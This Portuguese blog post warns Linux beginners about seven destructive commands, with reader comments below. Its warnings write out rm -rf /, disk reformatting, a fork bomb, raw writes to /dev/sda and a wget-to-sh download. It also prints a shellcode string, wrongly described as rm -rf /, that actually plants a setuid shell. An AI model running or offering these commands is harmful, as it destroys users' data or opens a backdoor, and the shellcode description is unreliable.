7 comandos letais no Linux

Danger

Se você é novo no Linux, possivelmente você encontrará pessoas estúpida, talvez em fóruns ou salas de bate-papo, que podem o enganar usando comandos que poderão  destruir seus arquivos e até mesmo todo o seu sistema operacional. Para evitar esse perigoso cenário de acontecer, tenho aqui uma lista de comandos Linux mortais que você deve evitar.

1. Comando: rm -rf /

Esse comoando irá, recurcivamente e forçadamente, deletar todos os arquivos dentro do diretório root.

2. Comando: char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Essa é a versão hexadecimal do rm -rf / que pode enganar até mesmo usuários Linux experientes.

3. Comando: mkfs.ext3 /dev/sda

Isso irá reformatar ou limpar todos os arquivos do dispositivo que é mencionado depois do comando mkfs.

4. Comando: :(){:|:&};:

Conhecido como forkbomb, esse comando dirá ao seu sistema para executar um grande número de processo até o sistema travar. Isso freqüentemente resulta em corrompimento de arquivos.

5. Comando: qualquer_comando > /dev/sda

Com esse comando, informações brutas serão escritas no dispositivo e podem, geralmente, danificar o sistema de arquivos, resultando em perda total de informações.

6. Comando: wget http://alguma_fonte_não_confiável -O- | sh

Nunca baixe de fontes não confiáveis e, em seguida, execute os códigos malicioso que possivelmente estão dando a você.

7. Comando: mv /home/seupastahome/* /dev/null

Esse comando moverá todos os arquivos que estão na sua pasta home para um local que não existe. Você nunca os verá novamente.

Existem, logicamente, outros comando Linux igualmente letais que deixei de incluir aqui, então se você tem algo a acrescentar, por favor, comparlihe conosco via comentários.

Fonte: Jun Auza@junauza.com

3 comentários:

Anônimo disse...

Muito bom mesmo.
No item 7. Comando: mv /home/seupastahome/* /dev/null, o estrago seria no /, rssssssssssss
ou dd if=/dev/zero of=/dev/hdXXXX
ou ainda o comando shred.....


Abraços

Anônimo disse...

@Marcio

As combinações desastrosas são tão variadas quanto as proteções do sistema. E confesso que essa "complacência" do sistema em deixar que usuário erre de maneira homérica me agrada. O sistema faz o que deve fazer, o que o usuário deseja, mesmo que destrua tudo. Segue o baile...

Anônimo disse...

syph0s,

Concordo com vc, e é uma das coisas que me agrada muito no Linux, o sistema parte do principio que quem opera, sabe o que faz.
É lindo, vc executa o rm -rf e ele te devolve o prompt,(não pergunta nada... tem certeza? olha só? veja bem? posso mesmo? etc..)
e pronto o estrago está feito.
Ou seja, só executa...
Comando errado!!!!!....
tarde demais, já era.
E o baile vai seguir pode ter certeza, rssss

Abraços, e mais uma vez Parabéns pelo Blog.

 
Powered by FeedBurner Creative Commons License
Esta obra está licenciada sob uma Licença Creative Commons.